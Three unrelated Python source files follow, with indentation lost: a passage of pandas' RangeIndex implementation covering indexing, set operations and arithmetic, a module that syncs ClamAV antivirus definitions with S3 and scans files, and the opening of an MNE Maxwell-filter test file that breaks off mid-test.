) -> npt.NDArray[np.intp]:
if com.any_not_none(method, tolerance, limit):
return super()._get_indexer(
target, method=method, tolerance=tolerance, limit=limit
)
if self.step > 0:
start, stop, step = self.start, self.stop, self.step
else:
# GH 28678: work on reversed range for simplicity
reverse = self._range[::-1]
start, stop, step = reverse.start, reverse.stop, reverse.step
target_array = np.asarray(target)
locs = target_array - start
valid = (locs % step == 0) & (locs >= 0) & (target_array < stop)
locs[~valid] = -1
locs[valid] = locs[valid] / step
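# Worked example (illustrative): for RangeIndex(0, 10, 2) and target
# np.array([4, 5, 6]), locs starts as [4, 5, 6]; only 4 and 6 are valid
# (non-negative, below stop and divisible by step), giving [2, -1, 3].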
if step != self.step:
# We reversed this range: transform to original locs
locs[valid] = len(self) - 1 - locs[valid]
return ensure_platform_int(locs)
# --------------------------------------------------------------------
def tolist(self) -> list[int]:
return list(self._range)
@doc(Int64Index.__iter__)
def __iter__(self):
yield from self._range
@doc(Int64Index._shallow_copy)
def _shallow_copy(self, values, name: Hashable = no_default):
name = self.name if name is no_default else name
if values.dtype.kind == "f":
return Float64Index(values, name=name)
return Int64Index._simple_new(values, name=name)
def _view(self: RangeIndex) -> RangeIndex:
result = type(self)._simple_new(self._range, name=self._name)
result._cache = self._cache
return result
@doc(Int64Index.copy)
def copy(
self,
name: Hashable = None,
deep: bool = False,
dtype: Dtype | None = None,
names=None,
):
name = self._validate_names(name=name, names=names, deep=deep)[0]
new_index = self._rename(name=name)
if dtype:
warnings.warn(
"parameter dtype is deprecated and will be removed in a future "
"version. Use the astype method instead.",
FutureWarning,
stacklevel=2,
)
new_index = new_index.astype(dtype)
return new_index
def _minmax(self, meth: str):
no_steps = len(self) - 1
if no_steps == -1:
return np.nan
elif (meth == "min" and self.step > 0) or (meth == "max" and self.step < 0):
return self.start
return self.start + self.step * no_steps
def min(self, axis=None, skipna: bool = True, *args, **kwargs) -> int:
"""The minimum value of the RangeIndex"""
nv.validate_minmax_axis(axis)
nv.validate_min(args, kwargs)
return self._minmax("min")
def max(self, axis=None, skipna: bool = True, *args, **kwargs) -> int:
"""The maximum value of the RangeIndex"""
nv.validate_minmax_axis(axis)
nv.validate_max(args, kwargs)
return self._minmax("max")
def argsort(self, *args, **kwargs) -> npt.NDArray[np.intp]:
"""
Returns the indices that would sort the index and its
underlying data.
Returns
-------
np.ndarray[np.intp]
See Also
--------
numpy.ndarray.argsort
"""
ascending = kwargs.pop("ascending", True) # EA compat
kwargs.pop("kind", None) # e.g. "mergesort" is irrelevant
nv.validate_argsort(args, kwargs)
if self._range.step > 0:
result = np.arange(len(self), dtype=np.intp)
else:
result = np.arange(len(self) - 1, -1, -1, dtype=np.intp)
if not ascending:
result = result[::-1]
return result
def factorize(
self, sort: bool = False, na_sentinel: int | None = -1
) -> tuple[npt.NDArray[np.intp], RangeIndex]:
codes = np.arange(len(self), dtype=np.intp)
uniques = self
if sort and self.step < 0:
codes = codes[::-1]
uniques = uniques[::-1]
return codes, uniques
def equals(self, other: object) -> bool:
"""
Determines if two Index objects contain the same elements.
"""
if isinstance(other, RangeIndex):
return self._range == other._range
return super().equals(other)
def sort_values(
self,
return_indexer: bool = False,
ascending: bool = True,
na_position: str = "last",
key: Callable | None = None,
):
sorted_index = self
indexer = RangeIndex(range(len(self)))
if key is not None:
return super().sort_values(
return_indexer=return_indexer,
ascending=ascending,
na_position=na_position,
key=key,
)
else:
sorted_index = self
if ascending:
if self.step < 0:
sorted_index = self[::-1]
indexer = indexer[::-1]
else:
if self.step > 0:
sorted_index = self[::-1]
indexer = indexer[::-1]
if return_indexer:
return sorted_index, indexer
else:
return sorted_index
# --------------------------------------------------------------------
# Set Operations
def _intersection(self, other: Index, sort=False):
# caller is responsible for checking self and other are both non-empty
if not isinstance(other, RangeIndex):
# Int64Index
return super()._intersection(other, sort=sort)
first = self._range[::-1] if self.step < 0 else self._range
second = other._range[::-1] if other.step < 0 else other._range
# check whether intervals intersect
# deals with in- and decreasing ranges
int_low = max(first.start, second.start)
int_high = min(first.stop, second.stop)
if int_high <= int_low:
return self._simple_new(_empty_range)
# Method hint: linear Diophantine equation
# solve intersection problem
# performance hint: for identical step sizes, could use
# cheaper alternative
gcd, s, _ = self._extended_gcd(first.step, second.step)
# check whether element sets intersect
if (first.start - second.start) % gcd:
return self._simple_new(_empty_range)
# calculate parameters for the RangeIndex describing the
# intersection disregarding the lower bounds
tmp_start = first.start + (second.start - first.start) * first.step // gcd * s
new_step = first.step * second.step // gcd
new_range = range(tmp_start, int_high, new_step)
new_index = self._simple_new(new_range)
# adjust index to limiting interval
new_start = new_index._min_fitting_element(int_low)
new_range = range(new_start, new_index.stop, new_index.step)
new_index = self._simple_new(new_range)
if (self.step < 0 and other.step < 0) is not (new_index.step < 0):
new_index = new_index[::-1]
if sort is None:
new_index = new_index.sort_values()
return new_index
def _min_fitting_element(self, lower_limit: int) -> int:
"""Returns the smallest element greater than or equal to the limit"""
no_steps = -(-(lower_limit - self.start) // abs(self.step))
return self.start + abs(self.step) * no_steps
def _extended_gcd(self, a: int, b: int) -> tuple[int, int, int]:
"""
Extended Euclidean algorithms to solve Bezout's identity:
a*x + b*y = gcd(a, b)
Finds one particular solution for x, y: s, t
Returns: gcd, s, t
"""
s, old_s = 0, 1
t, old_t = 1, 0
r, old_r = b, a
while r:
quotient = old_r // r
old_r, r = r, old_r - quotient * r
old_s, s = s, old_s - quotient * s
old_t, t = t, old_t - quotient * t
return old_r, old_s, old_t
def _union(self, other: Index, sort):
"""
Form the union of two Index objects and sorts if possible
Parameters
----------
other : Index or array-like
sort : False or None, default None
Whether to sort resulting index. ``sort=None`` returns a
monotonically increasing ``RangeIndex`` if possible or a sorted
``Int64Index`` if not. ``sort=False`` always returns an
unsorted ``Int64Index``
.. versionadded:: 0.25.0
Returns
-------
union : Index
"""
if isinstance(other, RangeIndex) and sort is None:
start_s, step_s = self.start, self.step
end_s = self.start + self.step * (len(self) - 1)
start_o, step_o = other.start, other.step
end_o = other.start + other.step * (len(other) - 1)
if self.step < 0:
start_s, step_s, end_s = end_s, -step_s, start_s
if other.step < 0:
start_o, step_o, end_o = end_o, -step_o, start_o
if len(self) == 1 and len(other) == 1:
step_s = step_o = abs(self.start - other.start)
elif len(self) == 1:
step_s = step_o
elif len(other) == 1:
step_o = step_s
start_r = min(start_s, start_o)
end_r = max(end_s, end_o)
if step_o == step_s:
if (
(start_s - start_o) % step_s == 0
and (start_s - end_o) <= step_s
and (start_o - end_s) <= step_s
):
return type(self)(start_r, end_r + step_s, step_s)
if (
(step_s % 2 == 0)
and (abs(start_s - start_o) == step_s / 2)
and (abs(end_s - end_o) == step_s / 2)
):
# e.g. range(0, 10, 2) and range(1, 11, 2)
# but not range(0, 20, 4) and range(1, 21, 4) GH#44019
return type(self)(start_r, end_r + step_s / 2, step_s / 2)
elif step_o % step_s == 0:
if (
(start_o - start_s) % step_s == 0
and (start_o + step_s >= start_s)
and (end_o - step_s <= end_s)
):
return type(self)(start_r, end_r + step_s, step_s)
elif step_s % step_o == 0:
if (
(start_s - start_o) % step_o == 0
and (start_s + step_o >= start_o)
and (end_s - step_o <= end_o)
):
return type(self)(start_r, end_r + step_o, step_o)
return super()._union(other, sort=sort)
def _difference(self, other, sort=None):
# optimized set operation if we have another RangeIndex
self._validate_sort_keyword(sort)
self._assert_can_do_setop(other)
other, result_name = self._convert_can_do_setop(other)
if not isinstance(other, RangeIndex):
return super()._difference(other, sort=sort)
if sort is None and self.step < 0:
return self[::-1]._difference(other)
res_name = ops.get_op_result_name(self, other)
first = self._range[::-1] if self.step < 0 else self._range
overlap = self.intersection(other)
if overlap.step < 0:
overlap = overlap[::-1]
if len(overlap) == 0:
return self.rename(name=res_name)
if len(overlap) == len(self):
return self[:0].rename(res_name)
# overlap.step will always be a multiple of self.step (see _intersection)
if len(overlap) == 1:
if overlap[0] == self[0]:
return self[1:]
elif overlap[0] == self[-1]:
return self[:-1]
elif len(self) == 3 and overlap[0] == self[1]:
return self[::2]
else:
return super()._difference(other, sort=sort)
elif len(overlap) == 2 and overlap[0] == first[0] and overlap[-1] == first[-1]:
# e.g. range(-8, 20, 7) and range(13, -9, -3)
return self[1:-1]
if overlap.step == first.step:
if overlap[0] == first.start:
# The difference is everything after the intersection
new_rng = range(overlap[-1] + first.step, first.stop, first.step)
elif overlap[-1] == first[-1]:
# The difference is everything before the intersection
new_rng = range(first.start, overlap[0], first.step)
elif overlap._range == first[1:-1]:
# e.g. range(4) and range(1, 3)
step = len(first) - 1
new_rng = first[::step]
else:
# The difference is not range-like
# e.g. range(1, 10, 1) and range(3, 7, 1)
return super()._difference(other, sort=sort)
else:
# We must have len(self) > 1, bc we ruled out above
# len(overlap) == 0 and len(overlap) == len(self)
assert len(self) > 1
if overlap.step == first.step * 2:
if overlap[0] == first[0] and overlap[-1] in (first[-1], first[-2]):
# e.g. range(1, 10, 1) and range(1, 10, 2)
new_rng = first[1::2]
elif overlap[0] == first[1] and overlap[-1] in (first[-1], first[-2]):
# e.g. range(1, 10, 1) and range(2, 10, 2)
new_rng = first[::2]
else:
# We can get here with e.g. range(20) and range(0, 10, 2)
return super()._difference(other, sort=sort)
else:
# e.g. range(10) and range(0, 10, 3)
return super()._difference(other, sort=sort)
new_index = type(self)._simple_new(new_rng, name=res_name)
if first is not self._range:
new_index = new_index[::-1]
return new_index
def symmetric_difference(self, other, result_name: Hashable = None, sort=None):
if not isinstance(other, RangeIndex) or sort is not None:
return super().symmetric_difference(other, result_name, sort)
left = self.difference(other)
right = other.difference(self)
result = left.union(right)
if result_name is not None:
result = result.rename(result_name)
return result
# --------------------------------------------------------------------
# error: Return type "Index" of "delete" incompatible with return type
# "RangeIndex" in supertype "Index"
def delete(self, loc) -> Index: # type: ignore[override]
# In some cases we can retain RangeIndex, see also
# DatetimeTimedeltaMixin._get_delete_freq
if is_integer(loc):
if loc == 0 or loc == -len(self):
return self[1:]
if loc == -1 or loc == len(self) - 1:
return self[:-1]
if len(self) == 3 and (loc == 1 or loc == -2):
return self[::2]
elif lib.is_list_like(loc):
slc = lib.maybe_indices_to_slice(np.asarray(loc, dtype=np.intp), len(self))
if isinstance(slc, slice):
# defer to RangeIndex._difference, which is optimized to return
# a RangeIndex whenever possible
other = self[slc]
return self.difference(other, sort=False)
return super().delete(loc)
def insert(self, loc: int, item) -> Index:
if len(self) and (is_integer(item) or is_float(item)):
# We can retain RangeIndex if inserting at the beginning or end,
# or right in the middle.
rng = self._range
if loc == 0 and item == self[0] - self.step:
new_rng = range(rng.start - rng.step, rng.stop, rng.step)
return type(self)._simple_new(new_rng, name=self.name)
elif loc == len(self) and item == self[-1] + self.step:
new_rng = range(rng.start, rng.stop + rng.step, rng.step)
return type(self)._simple_new(new_rng, name=self.name)
elif len(self) == 2 and item == self[0] + self.step / 2:
# e.g. inserting 1 into [0, 2]
step = int(self.step / 2)
new_rng = range(self.start, self.stop, step)
return type(self)._simple_new(new_rng, name=self.name)
return super().insert(loc, item)
def _concat(self, indexes: list[Index], name: Hashable) -> Index:
"""
Overriding parent method for the case of all RangeIndex instances.
When all members of "indexes" are of type RangeIndex: result will be
RangeIndex if possible, Int64Index otherwise. E.g.:
indexes = [RangeIndex(3), RangeIndex(3, 6)] -> RangeIndex(6)
indexes = [RangeIndex(3), RangeIndex(4, 6)] -> Int64Index([0,1,2,4,5])
"""
if not all(isinstance(x, RangeIndex) for x in indexes):
return super()._concat(indexes, name)
elif len(indexes) == 1:
return indexes[0]
rng_indexes = cast(List[RangeIndex], indexes)
start = step = next_ = None
# Filter the empty indexes
non_empty_indexes = [obj for obj in rng_indexes if len(obj)]
for obj in non_empty_indexes:
rng = obj._range
if start is None:
# This is set by the first non-empty index
start = rng.start
if step is None and len(rng) > 1:
step = rng.step
elif step is None:
# First non-empty index had only one element
if rng.start == start:
values = np.concatenate([x._values for x in rng_indexes])
result = Int64Index(values)
return result.rename(name)
step = rng.start - start
non_consecutive = (step != rng.step and len(rng) > 1) or (
next_ is not None and rng.start != next_
)
if non_consecutive:
result = Int64Index(np.concatenate([x._values for x in rng_indexes]))
return result.rename(name)
if step is not None:
next_ = rng[-1] + step
if non_empty_indexes:
# Get the stop value from "next" or alternatively
# from the last non-empty index
stop = non_empty_indexes[-1].stop if next_ is None else next_
return RangeIndex(start, stop, step).rename(name)
# Here all "indexes" had 0 length, i.e. were empty.
# In this case return an empty range index.
return RangeIndex(0, 0).rename(name)
def __len__(self) -> int:
"""
return the length of the RangeIndex
"""
return len(self._range)
@property
def size(self) -> int:
return len(self)
def __getitem__(self, key):
"""
Conserve RangeIndex type for scalar and slice keys.
"""
if isinstance(key, slice):
new_range = self._range[key]
return self._simple_new(new_range, name=self._name)
elif is_integer(key):
new_key = int(key)
try:
return self._range[new_key]
except IndexError as err:
raise IndexError(
f"index {key} is out of bounds for axis 0 with size {len(self)}"
) from err
elif is_scalar(key):
raise IndexError(
"only integers, slices (`:`), "
"ellipsis (`...`), numpy.newaxis (`None`) "
"and integer or boolean "
"arrays are valid indices"
)
# fall back to Int64Index
return super().__getitem__(key)
def _getitem_slice(self: RangeIndex, slobj: slice) -> RangeIndex:
"""
Fastpath for __getitem__ when we know we have a slice.
"""
res = self._range[slobj]
return type(self)._simple_new(res, name=self._name)
@unpack_zerodim_and_defer("__floordiv__")
def __floordiv__(self, other):
if is_integer(other) and other != 0:
if len(self) == 0 or self.start % other == 0 and self.step % other == 0:
start = self.start // other
step = self.step // other
stop = start + len(self) * step
new_range = range(start, stop, step or 1)
return self._simple_new(new_range, name=self.name)
if len(self) == 1:
start = self.start // other
new_range = range(start, start + 1, 1)
return self._simple_new(new_range, name=self.name)
return super().__floordiv__(other)
# --------------------------------------------------------------------
# Reductions
def all(self, *args, **kwargs) -> bool:
return 0 not in self._range
def any(self, *args, **kwargs) -> bool:
return any(self._range)
# --------------------------------------------------------------------
def _cmp_method(self, other, op):
if isinstance(other, RangeIndex) and self._range == other._range:
# Both are immutable so if ._range attr. are equal, shortcut is possible
return super()._cmp_method(self, op)
return super()._cmp_method(other, op)
def _arith_method(self, other, op):
"""
Parameters
----------
other : Any
op : callable that accepts 2 params
perform the binary op
"""
if isinstance(other, ABCTimedeltaIndex):
# Defer to TimedeltaIndex implementation
return NotImplemented
elif isinstance(other, (timedelta, np.timedelta64)):
# GH#19333 is_integer evaluated True on timedelta64,
# so we need to catch these explicitly
return super()._arith_method(other, op)
elif is_timedelta64_dtype(other):
# Must be an np.ndarray; GH#22390
return super()._arith_method(other, op)
if op in [
operator.pow,
ops.rpow,
operator.mod,
ops.rmod,
operator.floordiv,
ops.rfloordiv,
divmod,
ops.rdivmod,
]:
return super()._arith_method(other, op)
step: Callable | None = None
if op in [operator.mul, ops.rmul, operator.truediv, ops.rtruediv]:
step = op
# TODO: if other is a RangeIndex we may have more efficient options
right = extract_array(other, extract_numpy=True, extract_range=True)
left = self
try:
# apply if we have an override
if step:
with np.errstate(all="ignore"):
rstep = step(left.step, right)
# we don't have a representable op
# so return a base index
if not is_integer(rstep) or not rstep:
raise ValueError
else:
rstep = left.step
with np.errstate(all="ignore"):
rstart = op(left.start, right)
rstop = op(left.stop, right)
res_name = ops.get_op_result_name(self, other)
result = type(self)(rstart, rstop, rstep, name=res_name)
# for compat with numpy / Int64Index
# even if we can represent as a RangeIndex, return
# as a Float64Index if we have float-like descriptors
if not all(is_integer(x) for x in [rstart, rstop, rstep]):
result = result.astype("float64")
return result
except (ValueError, TypeError, ZeroDivisionError):
# Defer to Int64Index implementation
# test_arithmetic_explicit_conversions
return super()._arith_method(other, op)
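# --------------------------------------------------------------------
# Illustrative sketch, not part of pandas: a few of the RangeIndex fast paths
# implemented above. Results that are still representable as a range stay
# RangeIndex; anything else falls back to an integer index (the exact fallback
# class depends on the pandas version). Only runs when executed directly.
if __name__ == "__main__":
    import pandas as pd

    idx = pd.RangeIndex(0, 10, 2)
    print(idx.delete(0))      # RangeIndex(start=2, stop=10, step=2)
    print(idx.insert(0, -2))  # RangeIndex(start=-2, stop=10, step=2)
    print(idx // 2)           # RangeIndex(start=0, stop=5, step=1)
    # Not representable as a single range -> integer index fallback
    print(idx.symmetric_difference(pd.RangeIndex(4, 14, 2)))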
|
|
# -*- coding: utf-8 -*-
# Upside Travel, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import hashlib
import os
import pwd
import re
import subprocess
import boto3
import botocore
from pytz import utc
from common import AV_DEFINITION_S3_PREFIX, S3_ENDPOINT
from common import AV_DEFINITION_PATH
from common import AV_DEFINITION_FILE_PREFIXES
from common import AV_DEFINITION_FILE_SUFFIXES
from common import AV_SIGNATURE_OK
from common import AV_SIGNATURE_UNKNOWN
from common import AV_STATUS_CLEAN
from common import AV_STATUS_INFECTED
from common import CLAMAVLIB_PATH
from common import CLAMSCAN_PATH
from common import FRESHCLAM_PATH
from common import create_dir
RE_SEARCH_DIR = r"SEARCH_DIR\(\"=([A-Za-z0-9\/\-_]*)\"\)"
def current_library_search_path():
ld_verbose = subprocess.check_output(["ld", "--verbose"]).decode("utf-8")
rd_ld = re.compile(RE_SEARCH_DIR)
return rd_ld.findall(ld_verbose)
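# Illustrative sketch, not part of the original module: RE_SEARCH_DIR pulls the
# library directories out of `ld --verbose` output. The sample line below is
# made up for the demo; real output varies by system.
#
#     >>> re.findall(RE_SEARCH_DIR, 'SEARCH_DIR("=/usr/local/lib"); SEARCH_DIR("=/lib");')
#     ['/usr/local/lib', '/lib']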
def update_defs_from_s3(s3_client, bucket, prefix):
create_dir(AV_DEFINITION_PATH)
to_download = {}
for file_prefix in AV_DEFINITION_FILE_PREFIXES:
s3_best_time = None
for file_suffix in AV_DEFINITION_FILE_SUFFIXES:
filename = file_prefix + "." + file_suffix
s3_path = os.path.join(AV_DEFINITION_S3_PREFIX, filename)
local_path = os.path.join(AV_DEFINITION_PATH, filename)
s3_md5 = md5_from_s3_tags(s3_client, bucket, s3_path)
s3_time = time_from_s3(s3_client, bucket, s3_path)
if s3_best_time is not None and s3_time < s3_best_time:
print("Not downloading older file in series: %s" % filename)
continue
else:
s3_best_time = s3_time
if os.path.exists(local_path) and md5_from_file(local_path) == s3_md5:
print("Not downloading %s because local md5 matches s3." % filename)
continue
if s3_md5:
to_download[file_prefix] = {
"s3_path": s3_path,
"local_path": local_path,
}
return to_download
def upload_defs_to_s3(s3_client, bucket, prefix, local_path):
for file_prefix in AV_DEFINITION_FILE_PREFIXES:
for file_suffix in AV_DEFINITION_FILE_SUFFIXES:
filename = file_prefix + "." + file_suffix
local_file_path = os.path.join(local_path, filename)
if os.path.exists(local_file_path):
local_file_md5 = md5_from_file(local_file_path)
if local_file_md5 != md5_from_s3_tags(
s3_client, bucket, os.path.join(prefix, filename)
):
print(
"Uploading %s to s3://%s"
% (local_file_path, os.path.join(bucket, prefix, filename))
)
s3 = boto3.resource("s3", endpoint_url=S3_ENDPOINT)
s3_object = s3.Object(bucket, os.path.join(prefix, filename))
s3_object.upload_file(os.path.join(local_path, filename))
s3_client.put_object_tagging(
Bucket=s3_object.bucket_name,
Key=s3_object.key,
Tagging={"TagSet": [{"Key": "md5", "Value": local_file_md5}]},
)
else:
print(
"Not uploading %s because md5 on remote matches local."
% filename
)
else:
print("File does not exist: %s" % filename)
def update_defs_from_freshclam(path, library_path=""):
create_dir(path)
fc_env = os.environ.copy()
if library_path:
fc_env["LD_LIBRARY_PATH"] = "%s:%s" % (
":".join(current_library_search_path()),
CLAMAVLIB_PATH,
)
print("Starting freshclam with defs in %s." % path)
fc_proc = subprocess.Popen(
[
FRESHCLAM_PATH,
"--config-file=./bin/freshclam.conf",
"-u %s" % pwd.getpwuid(os.getuid())[0],
"--datadir=%s" % path,
],
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
env=fc_env,
)
output = fc_proc.communicate()[0]
print("freshclam output:\n%s" % output)
if fc_proc.returncode != 0:
print("Unexpected exit code from freshclam: %s." % fc_proc.returncode)
return fc_proc.returncode
def md5_from_file(filename):
hash_md5 = hashlib.md5()
with open(filename, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def md5_from_s3_tags(s3_client, bucket, key):
try:
tags = s3_client.get_object_tagging(Bucket=bucket, Key=key)["TagSet"]
except botocore.exceptions.ClientError as e:
expected_errors = {
"404", # Object does not exist
"AccessDenied", # Object cannot be accessed
"NoSuchKey", # Object does not exist
"MethodNotAllowed", # Object deleted in bucket with versioning
}
if e.response["Error"]["Code"] in expected_errors:
return ""
else:
raise
for tag in tags:
if tag["Key"] == "md5":
return tag["Value"]
return ""
def time_from_s3(s3_client, bucket, key):
try:
time = s3_client.head_object(Bucket=bucket, Key=key)["LastModified"]
except botocore.exceptions.ClientError as e:
expected_errors = {"404", "AccessDenied", "NoSuchKey"}
if e.response["Error"]["Code"] in expected_errors:
return datetime.datetime.fromtimestamp(0, utc)
else:
raise
return time
# Turn ClamAV scan output into a summary dict (one entry per "key: value" line)
def scan_output_to_json(output):
summary = {}
for line in output.split("\n"):
if ":" in line:
key, value = line.split(":", 1)
summary[key] = value.strip()
return summary
def scan_file(path):
av_env = os.environ.copy()
av_env["LD_LIBRARY_PATH"] = CLAMAVLIB_PATH
print("Starting clamscan of %s." % path)
av_proc = subprocess.Popen(
[CLAMSCAN_PATH, "-v", "-a", "--stdout", "-d", AV_DEFINITION_PATH, path],
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
env=av_env,
)
output = av_proc.communicate()[0].decode()
print("clamscan output:\n%s" % output)
# Turn the output into a data source we can read
summary = scan_output_to_json(output)
if av_proc.returncode == 0:
return AV_STATUS_CLEAN, AV_SIGNATURE_OK
elif av_proc.returncode == 1:
signature = summary.get(path, AV_SIGNATURE_UNKNOWN)
return AV_STATUS_INFECTED, signature
else:
msg = "Unexpected exit code from clamscan: %s.\n" % av_proc.returncode
print(msg)
raise Exception(msg)
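# Illustrative sketch, not part of the original module: the pure helpers above
# can be exercised locally without S3 or ClamAV installed. The sample scan
# output line is made up for the demo. Only runs when executed directly.
if __name__ == "__main__":
    import tempfile

    sample = "/tmp/eicar.txt: Eicar-Test-Signature FOUND\nInfected files: 1"
    print(scan_output_to_json(sample))
    # -> {'/tmp/eicar.txt': 'Eicar-Test-Signature FOUND', 'Infected files': '1'}

    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"clamav definition test data")
    print(md5_from_file(tmp.name))  # md5 hex digest of the temp file contents
    os.remove(tmp.name)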
|
|
# Author: Mark Wronkiewicz <wronk@uw.edu>
#
# License: BSD (3-clause)
import os.path as op
import warnings
import numpy as np
import sys
import scipy
from numpy.testing import assert_equal, assert_allclose
from nose.tools import assert_true, assert_raises
from nose.plugins.skip import SkipTest
from distutils.version import LooseVersion
from mne import compute_raw_covariance, pick_types
from mne.chpi import read_head_pos, filter_chpi
from mne.forward import _prep_meg_channels
from mne.cov import _estimate_rank_meeg_cov
from mne.datasets import testing
from mne.io import Raw, proc_history, read_info, read_raw_bti, read_raw_kit
from mne.preprocessing.maxwell import (
maxwell_filter, _get_n_moments, _sss_basis_basic, _sh_complex_to_real,
_sh_real_to_complex, _sh_negate, _bases_complex_to_real, _trans_sss_basis,
_bases_real_to_complex, _sph_harm, _prep_mf_coils)
from mne.tests.common import assert_meg_snr
from mne.utils import (_TempDir, run_tests_if_main, slow_test, catch_logging,
requires_version, object_diff)
from mne.externals.six import PY3
warnings.simplefilter('always') # Always throw warnings
data_path = testing.data_path(download=False)
sss_path = op.join(data_path, 'SSS')
pre = op.join(sss_path, 'test_move_anon_')
raw_fname = pre + 'raw.fif'
sss_std_fname = pre + 'stdOrigin_raw_sss.fif'
sss_nonstd_fname = pre + 'nonStdOrigin_raw_sss.fif'
sss_bad_recon_fname = pre + 'badRecon_raw_sss.fif'
sss_reg_in_fname = pre + 'regIn_raw_sss.fif'
sss_fine_cal_fname = pre + 'fineCal_raw_sss.fif'
sss_ctc_fname = pre + 'crossTalk_raw_sss.fif'
sss_trans_default_fname = pre + 'transDefault_raw_sss.fif'
sss_trans_sample_fname = pre + 'transSample_raw_sss.fif'
sss_st1FineCalCrossTalkRegIn_fname = \
pre + 'st1FineCalCrossTalkRegIn_raw_sss.fif'
sss_st1FineCalCrossTalkRegInTransSample_fname = \
pre + 'st1FineCalCrossTalkRegInTransSample_raw_sss.fif'
sss_movecomp_fname = pre + 'movecomp_raw_sss.fif'
sss_movecomp_reg_in_fname = pre + 'movecomp_regIn_raw_sss.fif'
sss_movecomp_reg_in_st4s_fname = pre + 'movecomp_regIn_st4s_raw_sss.fif'
erm_fname = pre + 'erm_raw.fif'
sss_erm_std_fname = pre + 'erm_devOrigin_raw_sss.fif'
sss_erm_reg_in_fname = pre + 'erm_regIn_raw_sss.fif'
sss_erm_fine_cal_fname = pre + 'erm_fineCal_raw_sss.fif'
sss_erm_ctc_fname = pre + 'erm_crossTalk_raw_sss.fif'
sss_erm_st_fname = pre + 'erm_st1_raw_sss.fif'
sss_erm_st1FineCalCrossTalk_fname = pre + 'erm_st1FineCalCrossTalk_raw_sss.fif'
sss_erm_st1FineCalCrossTalkRegIn_fname = \
pre + 'erm_st1FineCalCrossTalkRegIn_raw_sss.fif'
sample_fname = op.join(data_path, 'MEG', 'sample_audvis_trunc_raw.fif')
sss_samp_reg_in_fname = op.join(data_path, 'SSS',
'sample_audvis_trunc_regIn_raw_sss.fif')
sss_samp_fname = op.join(data_path, 'SSS', 'sample_audvis_trunc_raw_sss.fif')
pos_fname = op.join(data_path, 'SSS', 'test_move_anon_raw.pos')
bases_fname = op.join(sss_path, 'sss_data.mat')
fine_cal_fname = op.join(sss_path, 'sss_cal_3053.dat')
fine_cal_fname_3d = op.join(sss_path, 'sss_cal_3053_3d.dat')
ctc_fname = op.join(sss_path, 'ct_sparse.fif')
fine_cal_mgh_fname = op.join(sss_path, 'sss_cal_mgh.dat')
ctc_mgh_fname = op.join(sss_path, 'ct_sparse_mgh.fif')
sample_fname = op.join(data_path, 'MEG', 'sample',
'sample_audvis_trunc_raw.fif')
triux_path = op.join(data_path, 'SSS', 'TRIUX')
tri_fname = op.join(triux_path, 'triux_bmlhus_erm_raw.fif')
tri_sss_fname = op.join(triux_path, 'triux_bmlhus_erm_raw_sss.fif')
tri_sss_reg_fname = op.join(triux_path, 'triux_bmlhus_erm_regIn_raw_sss.fif')
tri_sss_st4_fname = op.join(triux_path, 'triux_bmlhus_erm_st4_raw_sss.fif')
tri_sss_ctc_fname = op.join(triux_path, 'triux_bmlhus_erm_ctc_raw_sss.fif')
tri_sss_cal_fname = op.join(triux_path, 'triux_bmlhus_erm_cal_raw_sss.fif')
tri_sss_ctc_cal_fname = op.join(
triux_path, 'triux_bmlhus_erm_ctc_cal_raw_sss.fif')
tri_sss_ctc_cal_reg_in_fname = op.join(
triux_path, 'triux_bmlhus_erm_ctc_cal_regIn_raw_sss.fif')
tri_ctc_fname = op.join(triux_path, 'ct_sparse_BMLHUS.fif')
tri_cal_fname = op.join(triux_path, 'sss_cal_BMLHUS.dat')
io_dir = op.join(op.dirname(__file__), '..', '..', 'io')
fname_ctf_raw = op.join(io_dir, 'tests', 'data', 'test_ctf_comp_raw.fif')
int_order, ext_order = 8, 3
mf_head_origin = (0., 0., 0.04)
mf_meg_origin = (0., 0.013, -0.006)
# otherwise we can get SVD error
requires_svd_convergence = requires_version('scipy', '0.12')
# 30 random bad MEG channels (20 grad, 10 mag) that were used in generation
bads = ['MEG0912', 'MEG1722', 'MEG2213', 'MEG0132', 'MEG1312', 'MEG0432',
'MEG2433', 'MEG1022', 'MEG0442', 'MEG2332', 'MEG0633', 'MEG1043',
'MEG1713', 'MEG0422', 'MEG0932', 'MEG1622', 'MEG1343', 'MEG0943',
'MEG0643', 'MEG0143', 'MEG2142', 'MEG0813', 'MEG2143', 'MEG1323',
'MEG0522', 'MEG1123', 'MEG0423', 'MEG2122', 'MEG2532', 'MEG0812']
def _assert_n_free(raw_sss, lower, upper=None):
"""Helper to check the DOF"""
upper = lower if upper is None else upper
n_free = raw_sss.info['proc_history'][0]['max_info']['sss_info']['nfree']
assert_true(lower <= n_free <= upper,
'nfree fail: %s <= %s <= %s' % (lower, n_free, upper))
@slow_test
@testing.requires_testing_data
def test_movement_compensation():
"""Test movement compensation"""
temp_dir = _TempDir()
lims = (0, 4, False)
raw = Raw(raw_fname, allow_maxshield='yes', preload=True).crop(*lims)
head_pos = read_head_pos(pos_fname)
#
# Movement compensation, no regularization, no tSSS
#
raw_sss = maxwell_filter(raw, head_pos=head_pos, origin=mf_head_origin,
regularize=None, bad_condition='ignore')
assert_meg_snr(raw_sss, Raw(sss_movecomp_fname).crop(*lims),
4.6, 12.4, chpi_med_tol=58)
# IO
temp_fname = op.join(temp_dir, 'test_raw_sss.fif')
raw_sss.save(temp_fname)
raw_sss = Raw(temp_fname)
assert_meg_snr(raw_sss, Raw(sss_movecomp_fname).crop(*lims),
4.6, 12.4, chpi_med_tol=58)
#
# Movement compensation, regularization, no tSSS
#
raw_sss = maxwell_filter(raw, head_pos=head_pos, origin=mf_head_origin)
assert_meg_snr(raw_sss, Raw(sss_movecomp_reg_in_fname).crop(*lims),
0.5, 1.9, chpi_med_tol=121)
#
# Movement compensation, regularization, tSSS at the end
#
raw_nohpi = filter_chpi(raw.copy())
with warnings.catch_warnings(record=True) as w: # untested feature
